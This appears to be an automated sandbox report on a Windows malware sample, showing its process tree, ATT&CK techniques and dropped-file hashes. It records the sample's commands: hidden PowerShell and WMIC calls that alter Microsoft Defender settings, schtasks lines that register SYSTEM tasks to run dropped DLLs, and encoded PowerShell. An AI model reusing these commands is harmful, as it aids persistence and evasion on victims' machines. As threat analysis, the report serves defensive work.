C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2584
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1272
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\nXmjFVOHU\RyMCYi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHXYugTugXnbcjp" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JHXYugTugXnbcjp2" /F /xml "C:\Program Files (x86)\nXmjFVOHU\GJRclpu.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JHXYugTugXnbcjp"3⤵PID:2996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JHXYugTugXnbcjp"3⤵PID:2888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LfFBsRWwzAIUSz" /F /xml "C:\Program Files (x86)\ANKVsfPAuVEU2\MTHlGcK.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ybYNGucztUodC2" /F /xml "C:\ProgramData\hVWjTjnIaijqmUVB\kXnJSSQ.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XPcedSoTrgNFjKDYa2" /F /xml "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\ThFUtiR.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tFGbXHHzrJEaMkVZkYf2" /F /xml "C:\Program Files (x86)\tuyZfYaPCcjxC\HXeXFKo.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wVNtBGnRpnzfZepfO" /SC once /ST 03:04:06 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\bpNowFaEeWbSfYmu\dbkNbVHi\SgzQVAO.dll\",#1 /QbdidMgx 525403" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wVNtBGnRpnzfZepfO"3⤵PID:1116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fxxmGIjnSbKlnnNZc"3⤵PID:2248
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 15203⤵
- Loads dropped DLL
- Program crash
PID:2236
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\bpNowFaEeWbSfYmu\dbkNbVHi\SgzQVAO.dll",#1 /QbdidMgx 5254032⤵PID:2512
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\bpNowFaEeWbSfYmu\dbkNbVHi\SgzQVAO.dll",#1 /QbdidMgx 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2660 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wVNtBGnRpnzfZepfO"4⤵PID:1772
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A2EBC2C4-E81E-4E98-A0F3-41982FF97F4C} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1272
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1532
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2956
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:568
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1712
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2188
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD58f616e371dac00ecef36325f2122929a
SHA108a8cb92fe85ce223716178283bab649f692b2b1
SHA256e3f98ff81a0282f01494ee610478df1d82ea7beb9988ed9853e82d6c123bbd7c
SHA512fa79825645b1e1ef932a7fd65663b99041882396c34c10e9887b40c8dffa08d032c92f80ebfbafb760c3ca11d4220876dfc5bf3ce6195baee9a0a9c229bbc414
-
Filesize
2KB
MD51dbf1495a12a8f38c2164dc070dd4ccb
SHA168d05cb4a79d92b38b9496c6bc2df423eeb8d669
SHA2566fd2c406c1b1cbf778a31272fe892e1806e787aa1a05a2a006766becf6b1e673
SHA512ad7ebb74e16967be23df2fc9abe29155d00a2a2c4c60dc93d1f11753c93167a3961567fe0fd630b6234aa4eec39b8b2528eed0628cb687e6ea1e398b2c84f234
-
Filesize
2KB
MD5deb36ffba83d79306491da780544342f
SHA1d32ba441b3a9cfd297b81c0e0af23cdaab75b658
SHA256a8c26e016fe5134b9593772acd22255c13ef71b2c791e8b6804679f365d55eea
SHA512e1432ebb359cf8eb58c8b7acb5657110b432efc37a420776e525c85b0aa9d6122e07eff695167f65680f9d7b96b7ec45bf2e57ec648836a3d9926bfb859433f9
-
Filesize
2KB
MD5c2d2111e235d53277e6000e55bb61ecd
SHA19f5e9023ac85c674f4ae294db470579942556001
SHA2562855b21203111f18e07516264786840bd6d58ca90ee508ac8cc5c737d238f08d
SHA51297b5ebd9d92d13f40e139c88abfd9ecd2b9bcaccb9364b639fff9aef08ab2c931b297b87d4ad023724250be26c12353f1a990d2b4029de0e7a14a32ed347ed54
-
Filesize
2.0MB
MD5edd8bdb7f07113c78f6a6e292344cb76
SHA1272a277442a8f109ea25d76f9ee87ed6782a5070
SHA2562a4ee8b01cad505d110c72468240e92f6fff4f1e32ad17ef7a8eba571b0b3d0f
SHA512c1a5cbd262683daa1a7a327293681612757e04bf928b6369e03fdcc75704492a38a625e12fc510b04d1d2752dca81148a0ff321e81896a8ec175e9d6b882ebd6
-
Filesize
2KB
MD533d946b0f89d1bfc517a5d15f63c18ef
SHA1e74c1f81920eb7c3d9595bdda12beb163bbc95c0
SHA256ad2b734245f24aa33bacdd0e96026632f2f82404018991a0299270116146ecb9
SHA51299e1e69fbe1f9f1b1ae87c6bd726bf9b6beb5aa80a462c9d9feef12ad3e9d29836b15c4709a2d51c18619195acb392883a36ba3b1a8dcb15c0484f18d23b48c5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD54154b817d43796062d634c6b2aff5448
SHA10bff3efe34fb5ba8a9d87d0704d1dec40acfe00d
SHA256b76debd65737b485b5c389e7851717e5d1c635e3f0a51a48e7fbd2c20ffe721e
SHA5121f5dd67303c37db4772e2419999575c6299abb16dd8b955fd02afad289e1b611e80da162dfc98b8f4920f921fad62cb9b79cdee691b89e0b75e516715bf2d097
-
Filesize
27KB
MD547356f4763eb370409706ce7345bcbfc
SHA1da072bea37c5672459cf829dfda763ecdd52a08e
SHA2564b11646fd2ff161603dcfe7e9f435db8799dc85b35f0b9f8d56d90cf1fbae6bd
SHA51206ed0cffeb442e6d33591cce1f577cb1ca3d7ae26ec2d47cd24609b39931d55d5074fdf98b3ab986c49e208ecef19c64debd1f6a0e67fa8f95db724f31f2e055
-
Filesize
6.7MB
MD5e3fbf351ef5be877ef197fac43b7ef47
SHA1fa6fb09c45a31ac7d57d7bc99d5e87af07c9e867
SHA256a3a22fd958ee1abe33535eb3ce53e1fa35f3becf12401d643fa4f9bdce36ad7d
SHA512319cb4a53574980a1a7b3f1f316fcceb38ef6a60b7da023b1d06ee509ef06a6ed76a2f8e68e2fe25a2219f3eaa4c7f5ab845a7f3096916cdd1147a2b230bb59e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f089fde75e0f6926f38a5f5b6964ce00
SHA19fcccac9ac166397fb6104f54c6bcbbf31384b7a
SHA256e4c61a7c5d1819052eebdf99e62d3e5d00f54b78dc8c43f73f199a76838a89bf
SHA512491c84805e19e0129abbf39a1b08b478e5485b9fd0ace3b3e52ba2a1dc9564c56180b374b09017f5351a60cb4095b2d928c21fd169643e3fed97f352a78a615c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JU61MOBYNL92LPH8MR0B.temp
Filesize7KB
MD519ae82f5de77e50b6d738986584772d8
SHA19c1c1c081454ac386ae55a8571ddcc37703bb349
SHA2567c63d52f9df315326a237ba1641651965e83a65f171edf31983ef0d87f29c793
SHA51284101b3dcef17d697547b82482e18340f00950b4ae6c5964dd57dc2a26dd85bdd08c5fc32965af51c7adaa9d664b5b08cfd8708722b57ee9e7e6d09d0301ef15
-
Filesize
7KB
MD5f5840a69e762e7b4551f19e999f7d685
SHA12f4626014ca5a5498f9d5d5154b15fc0a9d1e271
SHA256b09e658ac15da538f2a64600f72d1460a721faaeb3125b6f0d64e71b37c46a7d
SHA5128ac1d059a844cf15da25e267cd15fe0180e8ad677a4c1cae3d00810f1fb525228d879ab8d7e116a2e7b6e3632aa691ad8e8a9997a08fcfe0d687b53a7474fd77
-
Filesize
6.5MB
MD5ea12b422cd860ca0caa9110b9f6220d2
SHA1110a6a5d2285c02600e137d639e08b0dec05a3be
SHA256a72a5def229fb3179fd1f846bf8d8920ad120b9092cad7f9b2785a66a719a910
SHA512c858c6c6a54c7e62ae8a77b2e9154c99bf1b9efb402d8fee134f1b5272e081591c5439cffd4ada7efade3290800bebf03c93b27c641b624d0d6de84c3d96f87e
-
Filesize
9KB
MD51c1a452d42d407f4754b47b7f66670a3
SHA115e002cd78c82d36fd51b939a4667d5ca9a9d2d2
SHA256669e9d2e644ac9f74b281d60ce53c5a38ab6a0ef3100fd78c22b3b9d56c12be8
SHA512d72ed1aabf8929f9d8e8e44dc2849c1cc38da441f1ed650d5864832bbe89ce7c41945daa5bba67e8d3a39065f35d7d9a74a8a22822f187642f4a19de57ae9ce3
-
Filesize
5KB
MD51dd8f7000b7260feb8627ac4c149b2a0
SHA1f9eedd75633940051be4e696b2460ff31d17cc47
SHA2561d27210464d6d0b3dce1288e3c789dd9c4bd6dc81ad77768a11debc0917c8fc8
SHA51241f8765dd1276c33a5cedf50e9b7fedf2d374cc5a2c22464908f41652c10ef5e8111354e345bc2569b604627d4c7fdba34e0cf7c9910087da238677c75a2a968
-
Filesize
6.4MB
MD5e1ff872348b3052edd4b7581554bc70b
SHA1e1d6bc3f3ac4277de9356529a7d26e6e87cc922e
SHA256041bb9da8cbda297a45446e957289e037514056234cc172d4dba9c3c27b3c068
SHA51233cb94760ee3f8552340c9e793f50e369f9a8fca738dcf4c044014e4054a927b22b3ae380010b6be0c181d1ae3f2901fd274207f3cbc2bd3b9e4c18a4d8f77f9